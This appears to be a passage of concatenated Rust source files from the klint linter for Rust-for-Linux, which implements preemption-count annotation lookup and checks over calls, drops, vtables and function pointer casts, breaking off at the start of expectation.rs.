Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/annotation.rs | src/preempt_count/annotation.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_hir::def::DefKind;
use rustc_hir::def_id::{CrateNum, DefId, DefIndex};
use rustc_hir::definitions::DefPathData;
use rustc_span::sym;
use crate::attribute::PreemptionCount;
use crate::ctxt::AnalysisCtxt;
impl<'tcx> AnalysisCtxt<'tcx> {
fn preemption_count_annotation_fallback(&self, def_id: DefId) -> PreemptionCount {
match self.crate_name(def_id.krate) {
// Happens in a test environment where build-std is not enabled.
sym::core | sym::alloc | sym::std => (),
_ => {
warn!(
"Unable to retrieve preemption count annotation of non-local function {:?}",
def_id
);
}
}
Default::default()
}
fn core_out_of_band_annotation(&self, def_id: DefId) -> PreemptionCount {
if self.def_kind(def_id) == DefKind::AssocFn
&& let Some(impl_) = self.impl_of_assoc(def_id)
{
let self_ty = self.type_of(impl_);
let Some(fn_name) = self.def_path(def_id).data.last().copied() else {
return Default::default();
};
let DefPathData::ValueNs(fn_name) = fn_name.data else {
return Default::default();
};
if let Some(adt_def) = self_ty.skip_binder().ty_adt_def()
&& let data = self.def_path(adt_def.did()).data
&& data.len() == 3
&& let DefPathData::TypeNs(crate::symbol::task) = data[0].data
&& let DefPathData::TypeNs(crate::symbol::wake) = data[1].data
&& let DefPathData::TypeNs(sym::Waker) = data[2].data
{
if fn_name == sym::clone
|| fn_name == crate::symbol::wake
|| fn_name == crate::symbol::wake_by_ref
{
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: true,
};
}
}
return Default::default();
}
let data = self.def_path(def_id).data;
if data.len() == 3
&& let DefPathData::TypeNs(sym::any) = data[0].data
&& let DefPathData::TypeNs(sym::Any) = data[1].data
&& let DefPathData::ValueNs(_any_fn) = data[2].data
{
// This is a `core::any::Any::_` function.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: false,
};
}
if data.len() == 3
&& let DefPathData::TypeNs(crate::symbol::error) = data[0].data
&& let DefPathData::TypeNs(sym::Error) = data[1].data
&& let DefPathData::ValueNs(_any_fn) = data[2].data
{
// This is a `core::error::Error::_` function.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: false,
};
}
if data.len() == 3
&& let DefPathData::TypeNs(fmt) = data[0].data
&& fmt == sym::fmt
&& let DefPathData::TypeNs(_fmt_trait) = data[1].data
&& let DefPathData::ValueNs(fmt_fn) = data[2].data
&& fmt_fn == sym::fmt
{
// This is a `core::fmt::Trait::fmt` function.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: false,
};
}
if data.len() == 3
&& let DefPathData::TypeNs(sym::fmt) = data[0].data
&& let DefPathData::TypeNs(crate::symbol::Write) = data[1].data
&& let DefPathData::ValueNs(_write_fn) = data[2].data
{
// This is a `core::fmt::Write::write_{str, char, fmt}` function.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: false,
};
}
if data.len() == 2
&& let DefPathData::TypeNs(sym::fmt) = data[0].data
&& let DefPathData::ValueNs(crate::symbol::write) = data[1].data
{
// This is `core::fmt::write` function, which uses function pointers internally.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: true,
};
}
if data.len() == 5
&& let DefPathData::TypeNs(sym::slice) = data[0].data
&& let DefPathData::TypeNs(crate::symbol::sort) = data[1].data
&& let DefPathData::TypeNs(sym::unstable) = data[2].data
&& let DefPathData::TypeNs(crate::symbol::quicksort) = data[3].data
&& let DefPathData::ValueNs(crate::symbol::partition) = data[4].data
{
// HACK: `core::sort::unstable::quicksort::partition` uses a const fn to produce a
// function pointer which is called at runtime. This means that it'll guarantee to be
// the same function, so in theory we could see through and check, but this is
// currently beyond klint's ability.
//
// Given this is an internal function and it's only called by `quicksort`, which
// already calls into `is_less` in other means, we shouldn't need to depend on
// `partition` to deduce correct property.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: true,
};
}
Default::default()
}
}
memoize!(
pub fn preemption_count_annotation<'tcx>(
cx: &AnalysisCtxt<'tcx>,
def_id: DefId,
) -> PreemptionCount {
if cx.crate_name(def_id.krate) == sym::core {
return cx.core_out_of_band_annotation(def_id);
}
let Some(local_def_id) = def_id.as_local() else {
if let Some(v) = cx.sql_load::<preemption_count_annotation>(def_id) {
return v;
}
return cx.preemption_count_annotation_fallback(def_id);
};
let hir_id = cx.local_def_id_to_hir_id(local_def_id);
for attr in cx.klint_attributes(hir_id).iter() {
match attr {
crate::attribute::KlintAttribute::PreemptionCount(pc) => {
return *pc;
}
_ => (),
}
}
Default::default()
}
);
impl crate::ctxt::PersistentQuery for preemption_count_annotation {
type LocalKey<'tcx> = DefIndex;
fn into_crate_and_local<'tcx>(key: Self::Key<'tcx>) -> (CrateNum, Self::LocalKey<'tcx>) {
(key.krate, key.index)
}
}
memoize!(
pub fn drop_preemption_count_annotation<'tcx>(
cx: &AnalysisCtxt<'tcx>,
def_id: DefId,
) -> PreemptionCount {
let Some(local_def_id) = def_id.as_local() else {
if let Some(v) = cx.sql_load::<drop_preemption_count_annotation>(def_id) {
return v;
}
return cx.preemption_count_annotation_fallback(def_id);
};
let hir_id = cx.local_def_id_to_hir_id(local_def_id);
for attr in cx.klint_attributes(hir_id).iter() {
match attr {
crate::attribute::KlintAttribute::DropPreemptionCount(pc) => {
return *pc;
}
_ => (),
}
}
Default::default()
}
);
impl crate::ctxt::PersistentQuery for drop_preemption_count_annotation {
type LocalKey<'tcx> = DefIndex;
fn into_crate_and_local<'tcx>(key: Self::Key<'tcx>) -> (CrateNum, Self::LocalKey<'tcx>) {
(key.krate, key.index)
}
}
memoize!(
pub fn should_report_preempt_count<'tcx>(cx: &AnalysisCtxt<'tcx>, def_id: DefId) -> bool {
let Some(local_def_id) = def_id.as_local() else {
return false;
};
let hir_id = cx.local_def_id_to_hir_id(local_def_id);
for attr in cx.klint_attributes(hir_id).iter() {
match attr {
crate::attribute::KlintAttribute::ReportPreeptionCount => return true,
_ => (),
}
}
false
}
);
memoize!(
pub fn should_dump_mir<'tcx>(cx: &AnalysisCtxt<'tcx>, def_id: DefId) -> bool {
let Some(local_def_id) = def_id.as_local() else {
return false;
};
let hir_id = cx.local_def_id_to_hir_id(local_def_id);
for attr in cx.klint_attributes(hir_id).iter() {
match attr {
crate::attribute::KlintAttribute::DumpMir => return true,
_ => (),
}
}
false
}
);
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/check.rs | src/preempt_count/check.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_hir::LangItem;
use rustc_hir::def_id::DefId;
use rustc_infer::traits::util::PredicateSet;
use rustc_middle::mir::interpret::{AllocId, ErrorHandled, GlobalAlloc, Scalar};
use rustc_middle::mir::{self, Body, Location, visit::Visitor as MirVisitor};
use rustc_middle::ty::adjustment::PointerCoercion;
use rustc_middle::ty::{
self, GenericArgs, GenericParamDefKind, Instance, PseudoCanonicalInput, Ty, TyCtxt,
TypeFoldable, TypeVisitableExt, TypingEnv, Upcast,
};
use rustc_span::{DUMMY_SP, Span};
use super::Error;
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::PolyDisplay;
use crate::diagnostic::use_stack::{UseSite, UseSiteKind};
struct MirNeighborVisitor<'mir, 'tcx, 'cx> {
cx: &'cx AnalysisCtxt<'tcx>,
body: &'mir Body<'tcx>,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
result: Result<(), Error>,
}
impl<'mir, 'tcx, 'cx> MirNeighborVisitor<'mir, 'tcx, 'cx> {
fn monomorphize<T: TypeFoldable<TyCtxt<'tcx>> + Clone>(&self, v: T) -> T {
self.instance.instantiate_mir_and_normalize_erasing_regions(
self.cx.tcx,
self.typing_env,
ty::EarlyBinder::bind(v),
)
}
fn check_vtable_unsizing(
&mut self,
source_ty: Ty<'tcx>,
target_ty: Ty<'tcx>,
span: Span,
) -> Result<(), Error> {
let ty::Dynamic(source_trait_ref, ..) = source_ty.kind() else {
bug!()
};
let ty::Dynamic(target_trait_ref, ..) = target_ty.kind() else {
bug!()
};
let source_annotation = source_trait_ref
.principal()
.map(|x| self.cx.drop_preemption_count_annotation(x.def_id()))
.unwrap_or_default();
let target_annotation = target_trait_ref
.principal()
.map(|x| self.cx.drop_preemption_count_annotation(x.def_id()))
.unwrap_or_default();
let source_adjustment = source_annotation
.adjustment
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.0);
let target_adjustment = target_annotation
.adjustment
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.0);
let source_expectation = source_annotation
.expectation
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.1);
let target_expectation = target_annotation
.expectation
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.1);
if source_adjustment != target_adjustment
|| !source_expectation.contains_range(target_expectation)
{
let mut diag = self.cx.tcx.dcx().struct_span_err(
span,
"casting between traits with incompatible preemption count properties",
);
diag.help(format!(
"adjustment of `{}` is {} and expectation is {}",
source_ty, source_adjustment, source_expectation
));
diag.help(format!(
"while the expected adjustment of `{}` is {} and the expectation is {}",
target_ty, target_adjustment, target_expectation
));
self.cx.emit_with_use_site_info(diag);
return Ok(());
}
Ok(())
}
fn check_vtable_construction(
&mut self,
ty: Ty<'tcx>,
trait_ref: Option<ty::PolyExistentialTraitRef<'tcx>>,
span: Span,
) -> Result<(), Error> {
self.cx.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::Vtable(span),
});
let result = self
.cx
.vtable_construction_check_indirect(self.typing_env.as_query_input((ty, trait_ref)));
self.cx.call_stack.borrow_mut().pop();
result
}
fn check_fn_pointer_cast(&mut self, instance: Instance<'tcx>, span: Span) -> Result<(), Error> {
self.cx.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::PointerCoercion(span),
});
let result = self
.cx
.function_pointer_cast_check_indirect(self.typing_env.as_query_input(instance));
self.cx.call_stack.borrow_mut().pop();
result
}
fn check_rvalue(
&mut self,
rvalue: &mir::Rvalue<'tcx>,
location: Location,
) -> Result<(), Error> {
let span = self.body.source_info(location).span;
match *rvalue {
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::Unsize, _),
ref operand,
target_ty,
) => {
let target_ty = self.monomorphize(target_ty);
let source_ty = operand.ty(self.body, self.cx.tcx);
let source_ty = self.monomorphize(source_ty);
let (source_ty, target_ty) = crate::monomorphize_collector::find_tails_for_unsizing(
self.cx.tcx.at(span),
self.typing_env,
source_ty,
target_ty,
);
if let ty::Dynamic(trait_ty, ..) = target_ty.kind() {
if let ty::Dynamic(..) = source_ty.kind() {
// This is trait upcasting.
self.check_vtable_unsizing(source_ty, target_ty, span)?;
} else {
// This is unsizing of a concrete type to a trait object.
self.check_vtable_construction(source_ty, trait_ty.principal(), span)?;
}
}
}
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::ReifyFnPointer(_), _),
ref operand,
_,
) => {
let fn_ty = operand.ty(self.body, self.cx.tcx);
let fn_ty = self.monomorphize(fn_ty);
if let ty::FnDef(def_id, args) = *fn_ty.kind() {
let instance =
ty::Instance::try_resolve(self.cx.tcx, self.typing_env, def_id, args)
.unwrap()
.ok_or(Error::TooGeneric)?;
self.check_fn_pointer_cast(instance, span)?;
}
}
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::ClosureFnPointer(_), _),
ref operand,
_,
) => {
let source_ty = operand.ty(self.body, self.cx.tcx);
let source_ty = self.monomorphize(source_ty);
match *source_ty.kind() {
ty::Closure(def_id, args) => {
let instance = Instance::resolve_closure(
self.cx.tcx,
def_id,
args,
ty::ClosureKind::FnOnce,
);
self.check_fn_pointer_cast(instance, span)?;
}
_ => bug!(),
}
}
mir::Rvalue::ThreadLocalRef(def_id) => {
assert!(self.cx.is_thread_local_static(def_id));
self.check_static(def_id)?;
}
_ => (),
}
Ok(())
}
fn check_alloc(&mut self, alloc_id: AllocId, span: Span) -> Result<(), Error> {
match self.cx.global_alloc(alloc_id) {
GlobalAlloc::Static(def_id) => {
assert!(!self.cx.is_thread_local_static(def_id));
self.check_static(def_id)?;
}
GlobalAlloc::Memory(alloc) => {
for inner in alloc.inner().provenance().provenances() {
rustc_data_structures::stack::ensure_sufficient_stack(|| {
self.check_alloc(inner.alloc_id(), span)
})?;
}
}
GlobalAlloc::Function { instance, .. } => {
self.check_fn_pointer_cast(instance, span)?;
}
GlobalAlloc::VTable(ty, dyn_ty) => {
self.check_vtable_construction(ty, dyn_ty.principal(), span)?;
}
GlobalAlloc::TypeId { .. } => {}
}
Ok(())
}
fn check_const(&mut self, value: mir::ConstValue, span: Span) -> Result<(), Error> {
match value {
mir::ConstValue::Scalar(Scalar::Ptr(ptr, _size)) => {
self.check_alloc(ptr.provenance.alloc_id(), span)?;
}
mir::ConstValue::Indirect { alloc_id, .. }
| mir::ConstValue::Slice { alloc_id, meta: _ } => self.check_alloc(alloc_id, span)?,
_ => {}
}
Ok(())
}
fn check_terminator(
&mut self,
terminator: &mir::Terminator<'tcx>,
location: Location,
) -> Result<(), Error> {
let span = self.body.source_info(location).span;
let tcx = self.cx.tcx;
match terminator.kind {
mir::TerminatorKind::Call { ref func, .. }
| mir::TerminatorKind::TailCall { ref func, .. } => {
let callee_ty = func.ty(self.body, tcx);
let callee_ty = self.monomorphize(callee_ty);
if let ty::FnDef(def_id, args) = *callee_ty.kind() {
let instance =
ty::Instance::try_resolve(self.cx.tcx, self.typing_env, def_id, args)
.unwrap()
.ok_or(Error::TooGeneric)?;
self.cx.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::Call(span),
});
let result = self
.cx
.instance_check(self.typing_env.as_query_input(instance));
self.cx.call_stack.borrow_mut().pop();
result?
}
}
mir::TerminatorKind::Drop { ref place, .. } => {
let ty = place.ty(self.body, self.cx.tcx).ty;
let ty = self.monomorphize(ty);
self.cx.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::Drop {
drop_span: span,
place_span: self.body.local_decls[place.local].source_info.span,
},
});
let result = self.cx.drop_check(self.typing_env.as_query_input(ty));
self.cx.call_stack.borrow_mut().pop();
result?
}
mir::TerminatorKind::InlineAsm { ref operands, .. } => {
for op in operands {
match *op {
mir::InlineAsmOperand::SymFn { ref value } => {
let fn_ty = self.monomorphize(value.const_.ty());
if let ty::FnDef(def_id, args) = *fn_ty.kind() {
let instance = ty::Instance::try_resolve(
self.cx.tcx,
self.typing_env,
def_id,
args,
)
.unwrap()
.ok_or(Error::TooGeneric)?;
self.check_fn_pointer_cast(instance, span)?;
}
}
mir::InlineAsmOperand::SymStatic { def_id } => {
self.check_static(def_id)?;
}
_ => {}
}
}
}
mir::TerminatorKind::Assert { .. }
| mir::TerminatorKind::UnwindTerminate { .. }
| mir::TerminatorKind::Goto { .. }
| mir::TerminatorKind::SwitchInt { .. }
| mir::TerminatorKind::UnwindResume
| mir::TerminatorKind::Return
| mir::TerminatorKind::Unreachable => {}
mir::TerminatorKind::CoroutineDrop
| mir::TerminatorKind::Yield { .. }
| mir::TerminatorKind::FalseEdge { .. }
| mir::TerminatorKind::FalseUnwind { .. } => bug!(),
}
Ok(())
}
fn check_static(&mut self, def_id: DefId) -> Result<(), Error> {
if !self
.cx
.tcx
.should_codegen_locally(Instance::mono(self.cx.tcx, def_id))
{
return Ok(());
}
let span = self.cx.def_span(def_id);
if let Ok(alloc) = self.cx.eval_static_initializer(def_id) {
for prov in alloc.inner().provenance().provenances() {
self.check_alloc(prov.alloc_id(), span)?;
}
}
Ok(())
}
}
impl<'mir, 'tcx, 'cx> MirVisitor<'tcx> for MirNeighborVisitor<'mir, 'tcx, 'cx> {
fn visit_rvalue(&mut self, rvalue: &mir::Rvalue<'tcx>, location: Location) {
if self.result.is_err() {
return;
}
self.result = self.check_rvalue(rvalue, location);
if self.result.is_err() {
return;
}
self.super_rvalue(rvalue, location);
}
fn visit_const_operand(&mut self, constant: &mir::ConstOperand<'tcx>, location: Location) {
if self.result.is_err() {
return;
}
let const_ = self.monomorphize(constant.const_);
let val = match const_.eval(self.cx.tcx, self.typing_env, constant.span) {
Ok(v) => v,
Err(ErrorHandled::Reported(..)) => return,
Err(ErrorHandled::TooGeneric(..)) => {
self.result = Err(Error::TooGeneric);
return;
}
};
self.result = self.check_const(val, self.body.source_info(location).span);
}
fn visit_terminator(&mut self, terminator: &mir::Terminator<'tcx>, location: Location) {
if self.result.is_err() {
return;
}
self.result = self.check_terminator(terminator, location);
if self.result.is_err() {
return;
}
self.super_terminator(terminator, location);
}
fn visit_local(
&mut self,
_place_local: mir::Local,
_context: mir::visit::PlaceContext,
_location: Location,
) {
}
}
impl<'tcx> AnalysisCtxt<'tcx> {
pub fn do_indirect_check(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<(), Error> {
let mut visitor = MirNeighborVisitor {
cx: self,
typing_env,
instance,
body,
result: Ok(()),
};
visitor.visit_body(body);
visitor.result
}
pub fn indirect_check(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
) -> Result<(), Error> {
if !self
.recursion_limit()
.value_within_limit(self.call_stack.borrow().len())
{
self.emit_with_use_site_info(self.dcx().struct_fatal(format!(
"reached the recursion limit while checking indirect calls for `{}`",
PolyDisplay(&typing_env.as_query_input(instance))
)));
}
rustc_data_structures::stack::ensure_sufficient_stack(|| {
self.do_indirect_check(typing_env, instance, body)
})
}
}
memoize!(
// Make this a query so that the same function is only reported once even if converted to pointers
// in multiple sites.
#[instrument(skip(cx), fields(poly_instance = %PolyDisplay(&poly_instance)), ret)]
fn function_pointer_cast_check_indirect<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
) -> Result<(), Error> {
cx.instance_check(poly_instance)?;
let adj = cx.instance_adjustment(poly_instance)?;
let exp = cx.instance_expectation(poly_instance)?;
if adj != crate::atomic_context::INDIRECT_DEFAULT.0
|| !exp.contains_range(crate::atomic_context::INDIRECT_DEFAULT.1)
{
let mut diag = cx.dcx().struct_warn(
"converting this function to pointer may result in preemption count rule violation",
);
diag.help(format!(
"`{}` is being converted to a pointer",
PolyDisplay(&poly_instance)
));
diag.help(format!(
"adjustment of this function is inferred to be {} and expectation is inferred to be {}",
adj, exp
));
diag.help(format!(
"while the adjustment for function pointers is assumed to be {} and the expectation be {}",
crate::atomic_context::INDIRECT_DEFAULT.0,
crate::atomic_context::INDIRECT_DEFAULT.1
));
cx.emit_with_use_site_info(diag);
}
Ok(())
}
);
memoize!(
// Make this a query so that the same function is only reported once even if converted to pointers
// in multiple sites.
#[instrument(
skip(cx, poly_ty_trait_ref),
fields(
poly_ty = %PolyDisplay(&poly_ty_trait_ref.typing_env.as_query_input(poly_ty_trait_ref.value.0)),
trait_ref = ?poly_ty_trait_ref.value.1
),
ret
)]
fn vtable_construction_check_indirect<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_ty_trait_ref: PseudoCanonicalInput<
'tcx,
(Ty<'tcx>, Option<ty::PolyExistentialTraitRef<'tcx>>),
>,
) -> Result<(), Error> {
let PseudoCanonicalInput {
typing_env,
value: (ty, trait_ref),
} = poly_ty_trait_ref;
let mut diag = None;
if let Some(principal) = trait_ref {
let poly_trait_ref = principal.with_self_ty(cx.tcx, ty);
assert!(!poly_trait_ref.has_escaping_bound_vars());
let mut visited = PredicateSet::new(cx.tcx);
let predicate = poly_trait_ref.upcast(cx.tcx);
let mut stack: Vec<ty::PolyTraitRef<'tcx>> = vec![poly_trait_ref];
visited.insert(predicate);
while let Some(trait_ref) = stack.pop() {
let super_traits = cx
.explicit_super_predicates_of(trait_ref.def_id())
.iter_identity_copied()
.filter_map(|(pred, _)| {
pred.instantiate_supertrait(cx.tcx, trait_ref)
.as_trait_clause()
});
for supertrait in super_traits {
if visited.insert(supertrait.upcast(cx.tcx)) {
let supertrait = supertrait.map_bound(|t| t.trait_ref);
stack.push(supertrait);
}
}
for &entry in cx.own_existential_vtable_entries(trait_ref.def_id()) {
let args = trait_ref.map_bound(|trait_ref| {
GenericArgs::for_item(cx.tcx, entry, |param, _| match param.kind {
GenericParamDefKind::Lifetime => cx.tcx.lifetimes.re_erased.into(),
GenericParamDefKind::Type { .. }
| GenericParamDefKind::Const { .. } => {
trait_ref.args[param.index as usize]
}
})
});
let args = cx.normalize_erasing_late_bound_regions(typing_env, args);
let predicates = cx.predicates_of(entry).instantiate_own(cx.tcx, args);
if rustc_trait_selection::traits::impossible_predicates(
cx.tcx,
predicates.map(|(predicate, _)| predicate).collect(),
) {
continue;
}
let instance = ty::Instance::try_resolve(cx.tcx, typing_env, entry, args)
.unwrap()
.ok_or(Error::TooGeneric)?;
let poly_instance = typing_env.as_query_input(instance);
cx.instance_check(poly_instance)?;
// Find the `DefId` of the trait method.
let trait_item = if let Some(impl_) = cx.impl_of_assoc(instance.def_id()) {
cx.associated_items(impl_)
.in_definition_order()
.find(|x| x.def_id == instance.def_id())
.unwrap()
.trait_item_def_id()
.unwrap()
} else {
// `impl_of_assoc` returns `None` if this instance is from the default impl of a trait method.
instance.def_id()
};
let expected_adjustment = cx
.preemption_count_annotation(trait_item)
.adjustment
.unwrap_or(crate::atomic_context::VCALL_DEFAULT.0);
let expected_expectation = cx
.preemption_count_annotation(trait_item)
.expectation
.unwrap_or(crate::atomic_context::VCALL_DEFAULT.1);
let adj = cx.instance_adjustment(poly_instance)?;
let exp = cx.instance_expectation(poly_instance)?;
if adj != expected_adjustment || !exp.contains_range(expected_expectation) {
let diag = diag.get_or_insert_with(|| {
cx
.dcx()
.struct_warn("constructing this vtable may result in preemption count rule violation")
});
diag.help(format!(
"`{}` is constructed as part of `dyn {}`",
PolyDisplay(&poly_instance),
cx.def_path_str(principal.def_id())
));
diag.help(format!(
"adjustment is inferred to be {} and expectation is inferred to be {}",
adj, exp
));
diag.help(format!(
"while the expected adjustment for vtable is {} and the expectation is {}",
expected_adjustment, expected_expectation
));
}
}
}
}
// Check destructor
let poly_ty = typing_env.as_query_input(ty);
let drop_annotation = trait_ref
.map(|x| cx.drop_preemption_count_annotation(x.def_id()))
.unwrap_or_default();
let expected_adjustment = drop_annotation
.adjustment
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.0);
let expected_expectation = drop_annotation
.expectation
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.1);
let adj = cx.drop_adjustment(poly_ty)?;
let exp = cx.drop_expectation(poly_ty)?;
if adj != expected_adjustment || !exp.contains_range(expected_expectation) {
let diag = diag.get_or_insert_with(|| {
cx.dcx().struct_warn(
"constructing this vtable may result in preemption count rule violation",
)
});
diag.help(format!(
"drop glue of `{}` is constructed as part of `dyn {}`",
PolyDisplay(&poly_ty),
trait_ref
.map(|x| cx.def_path_str(x.def_id()))
.unwrap_or_default()
));
diag.help(format!(
"adjustment is inferred to be {} and expectation is inferred to be {}",
adj, exp
));
diag.help(format!(
"while the expected adjustment for vtable is {} and the expectation is {}",
expected_adjustment, expected_expectation
));
}
if let Some(diag) = diag {
cx.emit_with_use_site_info(diag);
}
Ok(())
}
);
memoize!(
#[instrument(skip(cx), fields(poly_ty = %PolyDisplay(&poly_ty)), ret)]
fn drop_check<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<(), Error> {
cx.drop_adjustment_check(poly_ty)?;
cx.drop_expectation_check(poly_ty)?;
let PseudoCanonicalInput {
typing_env,
value: ty,
} = poly_ty;
// If the type doesn't need drop, then it trivially refers to nothing.
if !ty.needs_drop(cx.tcx, typing_env) {
return Ok(());
}
match ty.kind() {
ty::Closure(_, args) => {
return cx
.drop_check(typing_env.as_query_input(args.as_closure().tupled_upvars_ty()));
}
// Coroutine drops are non-trivial, use the generated drop shims instead.
ty::Coroutine(..) => (),
ty::Tuple(list) => {
for ty in list.iter() {
cx.drop_check(typing_env.as_query_input(ty))?;
}
return Ok(());
}
_ if let Some(boxed_ty) = ty.boxed_ty() => {
cx.drop_check(typing_env.as_query_input(boxed_ty))?;
let drop_trait = cx.require_lang_item(LangItem::Drop, DUMMY_SP);
let drop_fn = cx.associated_item_def_ids(drop_trait)[0];
let box_free = ty::Instance::try_resolve(
cx.tcx,
typing_env,
drop_fn,
cx.mk_args(&[ty.into()]),
)
.unwrap()
.unwrap();
cx.instance_check(typing_env.as_query_input(box_free))?;
return Ok(());
}
ty::Adt(def, _) => {
// For Adts, we first try to not use any of the args and just try the most
// polymorphic version of the type.
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, def.did());
let poly_args = cx
.erase_and_anonymize_regions(GenericArgs::identity_for_item(cx.tcx, def.did()));
let poly_poly_ty = poly_typing_env
.as_query_input(cx.tcx.mk_ty_from_kind(ty::Adt(*def, poly_args)));
if poly_poly_ty != poly_ty {
match cx.drop_check(poly_poly_ty) {
Err(Error::TooGeneric) => (),
v => return v,
}
}
// If that fails, we try to use the args.
// Fallthrough to the MIR drop shim based logic.
}
ty::Dynamic(..) => return Ok(()),
// Array and slice drops only refer to respective element destructor.
ty::Array(elem_ty, _) | ty::Slice(elem_ty) => {
return cx.drop_check(typing_env.as_query_input(*elem_ty));
}
_ => return Err(Error::TooGeneric),
}
// Do not call `resolve_drop_in_place` because we need typing_env.
let drop_in_place = cx.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
let args = cx.mk_args(&[ty.into()]);
let instance = ty::Instance::try_resolve(cx.tcx, typing_env, drop_in_place, args)
.unwrap()
.unwrap();
let poly_instance = typing_env.as_query_input(instance);
assert!(matches!(
instance.def,
ty::InstanceKind::DropGlue(_, Some(_))
));
if cx
.call_stack
.borrow()
.iter()
.rev()
.any(|x| x.instance == poly_instance)
{
// Recursion encountered.
return Ok(());
}
let mir = crate::mir::drop_shim::build_drop_shim(cx, instance.def_id(), typing_env, ty);
cx.indirect_check(typing_env, instance, &mir)
}
);
memoize!(
#[instrument(skip(cx), fields(poly_instance = %PolyDisplay(&poly_instance)), ret)]
pub fn instance_check<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
) -> Result<(), Error> {
let PseudoCanonicalInput {
typing_env,
value: instance,
} = poly_instance;
if !cx.tcx.should_codegen_locally(instance) {
return Ok(());
}
cx.instance_adjustment_check(poly_instance)?;
cx.instance_expectation_check(poly_instance)?;
match instance.def {
// Rust built-in intrinsics does not refer to anything else.
ty::InstanceKind::Intrinsic(_) => return Ok(()),
// Empty drop glue, then it is a no-op.
ty::InstanceKind::DropGlue(_, None) => return Ok(()),
ty::InstanceKind::DropGlue(_, Some(ty)) => {
return cx.drop_check(typing_env.as_query_input(ty));
}
// Can't check further here. Will be checked at vtable generation site.
ty::InstanceKind::Virtual(_, _) => return Ok(()),
_ => (),
}
if matches!(instance.def, ty::InstanceKind::Item(_)) {
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, instance.def_id());
let poly_args = cx.erase_and_anonymize_regions(GenericArgs::identity_for_item(
cx.tcx,
instance.def_id(),
));
let poly_poly_instance =
poly_typing_env.as_query_input(Instance::new_raw(instance.def_id(), poly_args));
let generic = poly_poly_instance == poly_instance;
if !generic {
match cx.instance_check(poly_poly_instance) {
Err(Error::TooGeneric) => (),
expectation => return expectation,
}
}
}
// Foreign functions will not directly refer to Rust items
if cx.is_foreign_item(instance.def_id()) {
return Ok(());
}
if cx
.call_stack
.borrow()
.iter()
.rev()
.any(|x| x.instance == poly_instance)
{
// Recursion encountered.
return Ok(());
}
let mir = cx.analysis_instance_mir(instance.def);
cx.indirect_check(typing_env, instance, mir)
}
);
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/expectation.rs | src/preempt_count/expectation.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_errors::{EmissionGuarantee, MultiSpan};
use rustc_hir::LangItem;
use rustc_hir::def_id::CrateNum;
use rustc_middle::mir::{self, Body, TerminatorKind};
use rustc_middle::ty::{
self, GenericArgs, Instance, PseudoCanonicalInput, Ty, TypingEnv, TypingMode,
};
use rustc_mir_dataflow::Analysis;
use rustc_span::DUMMY_SP;
use rustc_trait_selection::infer::TyCtxtInferExt;
use super::dataflow::AdjustmentComputation;
use super::{Error, ExpectationRange};
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::PolyDisplay;
use crate::diagnostic::use_stack::{UseSite, UseSiteKind};
use crate::lattice::MeetSemiLattice;
impl<'tcx> AnalysisCtxt<'tcx> {
/// Query the preemption count expectation range of a certain `terminator` invocation.
pub fn terminator_expectation(
&self,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
body: &Body<'tcx>,
terminator: &mir::Terminator<'tcx>,
